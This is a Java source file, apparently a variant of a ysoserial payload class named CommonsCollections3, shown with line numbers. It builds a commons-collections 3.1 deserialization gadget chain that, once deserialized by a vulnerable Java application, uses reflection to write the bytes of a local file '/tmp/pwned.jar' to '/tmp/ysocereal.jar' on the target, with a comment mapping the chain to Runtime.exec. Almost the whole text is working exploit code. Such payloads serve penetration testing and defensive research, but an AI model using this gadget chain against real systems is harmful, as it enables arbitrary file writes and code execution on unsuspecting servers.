Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
package ysoserial.payloads;
2

3
import java.io.File;
4
import java.io.FileInputStream;
5
import java.lang.reflect.InvocationHandler;
6
import java.util.HashMap;
7
import java.util.Map;
8

9
import org.apache.commons.collections.Transformer;
10
import org.apache.commons.collections.functors.ChainedTransformer;
11
import org.apache.commons.collections.functors.ConstantTransformer;
12
import org.apache.commons.collections.functors.InvokerTransformer;
13
import org.apache.commons.collections.map.LazyMap;
14
import org.apache.commons.io.FileUtils;
15

16
import ysoserial.payloads.annotation.Dependencies;
17
import ysoserial.payloads.util.Gadgets;
18
import ysoserial.payloads.util.PayloadRunner;
19
import ysoserial.payloads.util.Reflections;
20

21
/*
22
	Gadget chain:	
23
		ObjectInputStream.readObject()
24
			AnnotationInvocationHandler.readObject()
25
				Map(Proxy).entrySet()
26
					AnnotationInvocationHandler.invoke()
27
						LazyMap.get()
28
							ChainedTransformer.transform()
29
								ConstantTransformer.transform()
30
								InvokerTransformer.transform()
31
									Method.invoke()				
32
										Class.getMethod()
33
								InvokerTransformer.transform()
34
									Method.invoke()
35
										Runtime.getRuntime()
36
								InvokerTransformer.transform()
37
									Method.invoke()
38
										Runtime.exec()										
39
	
40
	Requires:
41
		commons-collections
42
 */
43
@SuppressWarnings({"rawtypes", "unchecked"})
44
@Dependencies({"commons-collections:commons-collections:3.1"})
45
public class CommonsCollections3 extends PayloadRunner implements ObjectPayload<InvocationHandler> {
46
	
47
	public InvocationHandler getObject(final String command) throws Exception {
48
		final File f = new File("/tmp/ysocereal.jar");
49
        final byte[] bFile = FileUtils.readFileToByteArray(new File("/tmp/pwned.jar"));
50
		
51
		// inert chain for setup
52
		final Transformer transformerChain = new ChainedTransformer(
53
			new Transformer[]{ new ConstantTransformer(1) });
54
		// real chain for after setup
55
		final Transformer[] transformers = new Transformer[] {
56
				new ConstantTransformer(FileUtils.class),
57
				new InvokerTransformer("getMethod", new Class[] {
58
					String.class, Class[].class }, new Object[] {
59
					"writeByteArrayToFile", new Class[]{File.class, byte[].class} }),
60
				new InvokerTransformer("invoke", new Class[] {
61
					Object.class, Object[].class }, new Object[] {
62
					null, new Object[]{f,bFile} }),
63
				new ConstantTransformer(1) };
64

65
		final Map innerMap = new HashMap();
66

67
		final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
68
		
69
		final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);
70
		
71
		final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);
72
		
73
		Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain	
74
				
75
		return handler;
76
	}
77
	
78
	public static void main(final String[] args) throws Exception {
79
		PayloadRunner.run(CommonsCollections3.class, args);
80
	}
81
}
82

83